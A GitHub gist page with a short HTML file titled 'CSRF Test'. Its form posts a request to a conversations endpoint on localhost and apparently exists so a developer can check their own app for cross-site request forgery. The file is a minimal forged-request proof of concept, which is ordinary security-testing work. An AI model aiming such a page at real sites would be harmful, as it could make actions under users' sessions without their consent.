Created
September 23, 2014 01:03
-
-
Save ryan-scott-dev/efbd1135e16d9c078232 to your computer and use it in GitHub Desktop.
CSRF Test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>This file will try and create a conversation through a CSRF exploit using the session!</title> | |
<meta name="viewport" content="width=device-width,initial-scale=1"> | |
</head> | |
<body> | |
<h1>This file will try and create a node in the cloud using a CSRF exploit using the session!</h1> | |
<form action="http://localhost:3000/conversations" method="POST"> | |
<textarea name="request" text="I want a hacked jacket"></textarea> | |
<input type="submit" value="Create Conversation"/> | |
</form> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment